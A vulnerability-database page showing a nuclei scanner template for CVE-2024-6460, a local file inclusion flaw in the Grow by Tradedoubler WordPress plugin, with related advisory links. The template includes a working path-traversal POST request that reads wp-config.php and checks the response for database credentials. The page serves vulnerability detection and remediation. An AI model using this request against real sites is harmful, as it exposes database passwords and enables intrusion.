Lucene search
+L

WordPress Grow by Tradedoubler Plugin < 2.0.22 - Unauthenticated Local File Inclusion

🗓️ 07 Sep 2026 06:34:52Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Critical vulnerability in WordPress Grow by Tradedoubler Plugin allows unauthenticated file inclusion.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2024-6460
16 Aug 202408:42
circl
cnnvd
CNNVD
WordPress plugin Grow by Tradedoubler 安全漏洞
16 Aug 202400:00
cnnvd
cve
CVE
CVE-2024-6460
16 Aug 202406:00
cve
cvelist
Cvelist
CVE-2024-6460 Grow by Tradedoubler <= 2.0.21 - Unauthenticated LFI
16 Aug 202406:00
cvelist
kitploit
Kitploit
CVE-2024-6460
2 Sep 202609:40
kitploit
kitploit
Kitploit
CVE-2024-6460
2 Sep 202611:42
kitploit
nvd
NVD
CVE-2024-6460
16 Aug 202406:15
nvd
osv
OSV
CVE-2024-6460
16 Aug 202406:15
osv
patchstack
Patchstack
WordPress Grow by Tradedoubler plugin < 2.0.22 - Unauthenticated LFI vulnerability
16 Aug 202407:08
patchstack
patchstack
Patchstack
WordPress Grow by Tradedoubler Plugin < 2.0.22 is vulnerable to Local File Inclusion
16 Aug 202400:00
patchstack
Rows per page
id: CVE-2024-6460

info:
  name: WordPress Grow by Tradedoubler Plugin < 2.0.22 - Unauthenticated Local File Inclusion
  author: ritikchaddha
  severity: critical
  description: |
    The Grow by Tradedoubler WordPress plugin through version 2.0.21 is vulnerable to Local File Inclusion via the component parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
  impact: |
    Unauthenticated attackers can exploit local file inclusion to read sensitive files like wp-config.php and potentially execute arbitrary PHP code.
  remediation: |
    Update Grow by Tradedoubler plugin to version 2.0.22 or later to address the local file inclusion vulnerability.
  reference:
    - https://wpscan.com/vulnerability/ba2f53e0-30be-4f37-91bc-5fa151f1eee7
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6460
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6460
    cwe-id: CWE-22
    epss-score: 0.04826
    epss-percentile: 0.91394
  metadata:
    max-request: 2
    vendor: WordPress
    product: tradedoubler-affiliate-tracker
    fofa-query: body="wp-content/plugins/tradedoubler-affiliate-tracker/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,tradedoubler-affiliate-tracker,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "tradedoubler-affiliate-tracker"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=tm_load_data&component=../../../../wp-config.php

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022026c38bfb349f9b612df90584a3a7ed714886fcdcb884dba4551867fc3aae5672022008341c1000526556c76bff75a522d1fecb75518055ef2a0c283f15bab0f03c70:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.04826
SSVC
19